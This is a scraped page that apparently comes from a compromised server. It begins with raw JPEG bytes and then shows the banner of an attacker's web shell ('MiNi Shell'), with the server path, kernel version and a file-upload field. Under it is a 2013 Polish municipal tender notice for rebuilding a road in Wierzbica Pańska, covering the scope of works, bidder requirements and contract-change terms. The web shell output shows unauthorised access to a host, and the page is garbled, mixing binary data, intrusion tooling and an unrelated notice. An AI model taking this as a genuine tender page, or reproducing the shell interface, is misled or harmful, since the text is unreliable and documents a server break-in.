JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130711/271716-N-2013.html

<p class="kh_header"><b>Dzierzążnia: PRZEBUDOWA  DROGI  GMINNEJ  W  MIEJSCOWOŚCI  WIERZBICA PAŃSKA -
w km 0+000 do km 0+814,21, działki nr 20, 18,  31/1,</b><br>
<b>Numer ogłoszenia: 271716 - 2013; data zamieszczenia: 11.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dzierzążnia , 28, 09-164 Dzierzążnia, woj. mazowieckie, tel. 023 6615904 lub 02, faks 023 6615902.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA  DROGI  GMINNEJ  W  MIEJSCOWOŚCI  WIERZBICA PAŃSKA -
w km 0+000 do km 0+814,21, działki nr 20, 18,  31/1,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres rzeczowy zamówienia obejmuje wykonanie przebudowy drogi gminnej                        w miejscowości  WIERZBICA PAŃSKA  (działki nr 20, 18,  31/1 ) od km 0+000 do km 0+814,21 - poprzez położenie dywanika  asfaltowego z warstwy wiążącej (4cm) i ścieralnej (4cm)  na podbudowie warstwy kruszywa naturalnego grub. 24 cm po zagęszczeniu.

          ZAKRES  ZADANIA  OBEJMUJE:

a.		roboty przygotowawcze:   roboty pomiarowe przy liniowych robotach ziemnych 	- 0,81 km,      
            usunięcie warstwy urodzajnej ziemi (humusu) za pomocą spycharek.  Grubość warstwy do 15 
            cm  - 1515,00 m2,  transport z wywozem darniny na każde 	rozpoczęte 0,5 km ponad 0,5 km  -   
            1515,00 m2,

b. 		roboty rozbiórkowe: rozebranie ścianek czołowych przepustów wraz z wywiezieniem 			materiału z rozbiórki na odległość 10 km - sztuk 2 , rozebranie przepustu średnicy 60 cm. 
            z wywiezieniem materiału z rozbiórki na odległość 10 km - sztuk 1,

c.	roboty ziemne: roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki                                                                                                       	0,25m3,   z transportem urobku samochodami samowyładowczymi do 5t na odl. do 
            1 km. Grunt kat. I-II -  400,16 m3. Roboty ziemne wykonywane w miejscu wymiany gruntu  
             koparkami podsiębiernymi o poj. łyżki 0,60m3, z transportem materiału pochodzącego
             z dokopu  samochodami samowyładowczymi do 5 - 10t  na odl. do1 km. Grunt kat I-II   -
             68,91m3.  Nakłady uzup. do tablic za każdy rozpoczęty 1 km. odl. transportu ponad 1 km. 
             samochodami samowyładowczymi do 5 t., przy przewozie po drogach o nawierzchniach 
             utwardzonych . Grunt kat I-IV krotność 4 -  68,91m3,   formowanie i zagęszczanie nasypów 
             spycharkami 110 kW (150KM) Grunt kat. I-II -  469,07m3,

d.	podbudowa:   profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne  
            nawierzchni,  wykonywane mechanicznie przy użyciu walca wibracyjnego w gruntach 
            kategorii II-VI  -   3 127,55 m2,  warstwa podbudowy z kruszywa naturalnego (pospółki), 
            grubość warstwy po zagęszczeniu 24 cm  -  3 127,55m2,

e. 	nawierzchnia: skropienie nawierzchni drogowych asfaltem w ilości 0,8 dm3/m2 	- 
            3 031,70 m2,   nawierzchnie z mieszanek mineralno-asfaltowych warstwa wiążąca, 	grubość warstwy po zagęszczeniu 4cm. Transport mieszanki samochodem samowyład. 5-
            10t  - 3 031,70 m2,   skropienie nawierzchni drogowych asfaltem w ilości 0,5 dm3/m2 	- 
            2 935,85 m2,  nawierzchnie z mieszanek mineralno-asfaltowych,  warstwa ścieralna, grub.  
            warstwy po zagęszczeniu 4cm.  Transport mieszanki samochodem samowyład. 5-10t  - 
            2 935,85 m2,

f.          pobocza:   pobocza z kruszywa łamanego, grubość warstwy po zagęszczeniu 8cm - 
            1 288,32m2,

g.         zjazdy:    zjazdy z kruszywa łamanego, grubość warstwy po zagęszczeniu 15 cm - 43,00 m2,

h.	odwodnienie:
	przepusty rurowe pod koroną drogi, ścianki czołowe dla rur o średnicy 60cm - 2,00szt, 
            przepusty rurowe pod koroną drogi, rury PCV o średnicy 60 cm -   7,50m,  
            przepusty rurowe, ławy fundamentowe  żwirowe    -  0,34m3,

i.	oznakowanie:  pionowe znaki drogowe,  słupki z rur stalowych o średnicy 50 mm -  2,00 szt,         
            pionowe znaki drogowe, znaki zakazu, nakazu, ostrzegawcze  i  informacyjne o powierzchni    
            do 0,3 m2   -  2,00 szt.

j.	roboty wykończeniowe:   plantowanie (obrobienie na czysto)  powierzchni skarp i  korony  
            nasypów oraz wykopu. Grunt kat. I-II   - 850,40m2,   humusowanie skarp z obsianiem, 	            
            przy grubości warstwy humusu 5 cm   -  850,40m2.


      1)  Wykonawca w ramach przedmiotu zamówienia zobowiązany jest do zapewnienia obsługi  
            geodezyjnej przez uprawnione służby geodezyjne, obejmującej wytyczenie oraz 	inwentaryzację powykonawczą.
      2)  Szczegółowy zakres rzeczowy robót określają: przedmiar robót, dokumentacja projektowa oraz 
           szczegółowe specyfikacje techniczne. 
        3)  Wykonawcy zaleca się na własną odpowiedzialność, koszt i ryzyko odwiedzenia        
           i sprawdzenia miejsca robót oraz jego otoczenia w celu oceny czynników koniecznych do     
           przygotowania oferty i zawarcia umowy w sprawie zamówienia publicznego. Wizja w terenie 
           nie jest obowiązkowa ale zalecana. Wizja na terenie robót nie będzie organizowana przez 
           Zamawiającego.

2.  Wykonanie przedmiotu zamówienia:
1)	Przedmiot zamówienia, którym są roboty budowlane, należy wykonać zgodnie z wytycznymi
określonymi w specyfikacji istotnych warunków zamówienia, przedmiarze robót                       i dokumentacji projektowej, zgodnie z wiedzą, sztuką budowlaną, przepisami w zakresie bezpieczeństwa i higieny pracy, przepisami przeciwpożarowymi, stosując się do poleceń Inspektora Nadzoru Inwestorskiego.
2)	Wykonawca przed wbudowaniem materiałów zobowiązany jest do przedstawienia Inspektorowi Nadzoru dokumentów potwierdzających ich parametry w celu dokonania kontroli.
3)	Zabrania się Wykonawcy stosowania materiałów, które nie odpowiadają wymaganiom przypisanych im norm lub posiadają parametry inne, niż wskazane w dokumentacji przetargowej. Wyroby budowlane, które będą używane do realizacji przedmiotu zamówienia muszą spełniać wymagania wynikające z przepisów prawa, w tym w szczególności ustawy         z dnia 16 kwietnia 2004 roku o wyrobach budowlanych oraz ustawy z dnia 7 lipca 1994 roku Prawo budowlane.
4)	Wykonawca zobowiązany jest do:
a)	przygotowania zaplecza budowy, sprawowania dozoru na terenie robót oraz ponoszenia kosztów związanych z poborem wody i energii dla potrzeb budowy,
b)	usuwania na własny koszt odpadów i śmieci,
c)	zabezpieczenia terenu budowy przed wejściem osób trzecich oraz oznaczenia budowy,
d)	zapewnienia kierownictwa budowy przez osoby posiadające uprawnienia budowlane odpowiedniej specjalności, które to osoby są wpisane na listę członków właściwej izby 

samorządu zawodowego,
e)	zgłaszania Inspektorowi Nadzoru do odbioru robót zanikających lub ulegających zakryciu; nie zgłoszenie tych robót Inspektorowi, daje podstawę Zamawiającemu do żądania odkrycia robót i przywrócenia stanu poprzedniego na koszt i ryzyko Wykonawcy,
f)	przerwania robót na żądanie Zamawiającego oraz zabezpieczenia wykonanych robót,
g)	uporządkowania terenu budowy po zakończeniu robót,
h)	zgłaszania zamiaru wykonania robót zamiennych do Zamawiającego i Projektanta;  powyższa zamiana musi uzyskać akceptację Zamawiającego i Inspektora Nadzoru,
i)	zapewnienia Zamawiającemu oraz wszystkim osobom przez niego upoważnionym, pracownikom organów nadzoru budowlanego lub Państwowej Inspekcji Pracy dostępu na teren budowy oraz do wszystkich miejsc, gdzie są wykonywane roboty budowlane lub gdzie przewiduje się ich wykonanie, a są związane z realizacją przedmiotu umowy oraz przeprowadzania kontroli lub wizytacji w każdym stadium jego realizacji,
j)	dostarczenia na żądanie Inspektora Nadzoru i Zamawiającego wszelkich pomiarów, atestów i niezbędnych badań (wykonanych przez właściwe jednostki badawcze),
k)	zabezpieczenia i pokrycia kosztów obsługi służb pomocniczych i obsługi branżowych nadzorów technicznych, jeżeli takie wystąpią. 

5)	Wykonawca zobowiązany jest udzielić gwarancji jakości na zrealizowany przedmiot zamówienia (tj. wykonane roboty budowlane i wbudowane materiały) na okres co najmniej 36 miesięcy (Załącznik Nr 8 do SIWZ).
6) Zamawiający dopuszcza możliwość zaoferowania materiałów i urządzeń równoważnych 
       w stosunku do określonych w dokumentacji projektowej, przy czym nie mogą być one 
       o parametrach gorszych, niż materiałów i urządzeń wskazanych przez Zamawiającego 
       w projekcie, przedmiarze, szczegółowych specyfikacjach technicznych.    Użyte przez   
       Zamawiającego w dokumentacji przetargowej nazwy urządzeń i materiałów nie są obowiązujące i  
       należy przyjąć, iż stanowią wskazania/propozycje Zamawiającego.   Wyroby budowlane, które 
       będą używane do realizacji przedmiotu zamówienia muszą spełniać wymagania wynikające               
       z  przepisów prawa, w tym w szczególności ustawy z dnia 16 kwietnia 2004 roku o wyrobach   
       budowlanych oraz ustawy z dnia 7 lipca 1994 roku Prawo budowlane.
7)   Zamawiający posiada zgłoszenie właściwemu organowi zamiaru wykonania  przebudowy drogi 
      gminnej w miejscowości  WIERZBICA PAŃSKA  - działka nr 20,18,13/1, w km 0+000 -    
      0+814,21, z  dnia 15 kwietnia 2013r.,  pod nr AB.6743.281.2013..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.11.12.00-1, 45.23.32.00-1, 45.23.31.20-1, 45.23.20.00-2, 45.23.32.90-8, 45.40.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WADIUM 6 000,00 ZŁ (słownie: sześć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony na podstawie przedłożonego oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy Pzp (zał. nr 2 do SIWZ).
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego oświadczenia, tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego - spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp  -   nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył, co najmniej 2 roboty budowlane, których przedmiotem była budowa lub przebudowa drogi o na wierzchni  bitumicznej na podbudowie     z  kruszywa  naturalnego o wartości min. 300 000,00zl (każda z dróg) (Załącznik Nr 4 do SIWZ).  W celu udokumentowania spełnienia warunku Wykonawca zobowiązany jest złożyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (w szczególności mogą to być: referencje, opinie, listy polecające, protokoły odbioru końcowego). 
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego oświadczenia, tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego - spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp  -   nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony na podstawie przedłożonego oświadczenia o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy Pzp (zał. nr 2 do SIWZ).
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego oświadczenia, tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego - spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp  -   nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje osobami posiadającymi uprawnienia, których obowiązek posiadania nakłada ustawa Prawo budowlane, do kierowania robotami budowlanymi w specjalności budowlanej  drogowej (1 osoba) (Załącznik Nr 5 do SIWZ). 
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego oświadczenia, tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego - spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp  -   nie spełnia warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że jest ubezpieczony (opłacona polisa) od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż  500 000,00 zł (słownie: pięćset tysięcy złotych zero gorszy).  Z przedłożonej polisy  ubezpieczenia  musi  jednoznacznie  wynikać, że jest  opłacona, a w przypadku  złożenia  innego dokumentu- musi on potwierdzać w wystarczający  sposób, że  Wykonawca jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie prowadzonej działalności  związanej  z  przedmiotem  zamówienia.
Ocena spełniania warunku przez Wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonego oświadczenia, tj. złożone prawidłowo oświadczenie żądane przez Zamawiającego - spełnia warunek, nie złożone z zastrzeżeniem art. 26 ust. 3 ustawy Pzp  -   nie spełnia warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz dokumentów oraz oświadczeń wymienionych w pkt.VIII SIWZ należy złożyć:     a) formularz ofertowy, b)kserokopie dowodu wpłaty wadium, c)kosztorys ofertowy, d) niezbędne pełnomocnictwa, jeżeli zostały udzielone, e)zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne zmiany treści niniejszej umowy, przewidziane przez Zamawiającego, wymagają zachowania formy pisemnej pod rygorem nieważności.
2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w sytuacji niemożliwej do przewidzenia w chwili zawarcia umowy, na uzasadniony wniosek w następujących przypadkach: 
1)	zmiany adresu Wykonawcy, 
2)	zmiany nazwy firmy Wykonawcy
3)	wystąpi konieczność zmiany kadry przewidzianej do realizacji umowy (zmiana kluczowego personelu Wykonawcy lub Zamawiającego, m.in. kierownika budowy (robót),
4)	wystąpi konieczność zmiany konta bankowego Wykonawcy,
5)	w przypadku konieczności zmiany przedstawicieli Zamawiającego i Wykonawcy,
6)	Zamawiający przewiduje możliwość dokonania zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu robót, bądź wprowadzenia nowego podwykonawcy,
7)	dopuszcza się zmianę sposobu rozliczenia realizacji przedmiotu umowy oraz terminu wykonania zamówienia,
8)	wystąpi konieczność przedłużenia terminu wykonania przedmiotu zamówienia spowodowana: 
a)	zmianą dokumentacji projektowej w przypadku wystąpienia konieczności jej zmiany m.in. w zakresie aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny, 
z powodu wad ukrytych, istotnych braków lub błędów w dokumentacji projektowej również polegających na niezgodności z przepisami prawa,
b)	siłą wyższą lub innymi okolicznościami niezależnymi od Wykonawcy lub których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, 
c)	nie uzyskaniem decyzji administracyjnych, uzgodnień, opinii, niezbędnych do zakończenia prac stanowiących przedmiot umowy, pomimo złożenia kompletnych wniosków do właściwych organów w terminach przewidzianych w odpowiednich przepisach na ich wydanie,
d)	zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy i mających wpływ na zakres lub termin wykonania przedmiotu zamówienia,
e)	przedłużenia, w stosunku do terminów określonych przepisami prawa, czasu trwania procedur administracyjnych, mających wpływ na termin wykonania przedmiotu zamówienia, a nie wynikających z przyczyn leżących po stronie Wykonawcy,
f)	wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających, w okresie ich występowania, realizację przedmiotu zamówienia i mających wpływ na termin wykonania,
g)	wystąpienia konieczności wykonania robót zamiennych mających wpływ na koszt i/lub termin realizacji zadania podstawowego,
h)	zaistnieniem okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,
i)	ujawnienia wad opracowania projektowego, o których Zamawiający nie posiadał wiedzy, 
a które mają wpływ na termin lub koszt realizacji przedmiotu zamówienia,
j)	nie przekazania Wykonawcy przez Zamawiającego dokumentów budowy, do których przekazania Zamawiający był zobowiązany,
k)	wstrzymania przez Zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie Wykonawcy (nie dotyczy okoliczności wstrzymania robót przez Inspektora Nadzoru Inwestorskiego w przypadku stwierdzenia nieprawidłowości zawinionych przez Wykonawcę).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
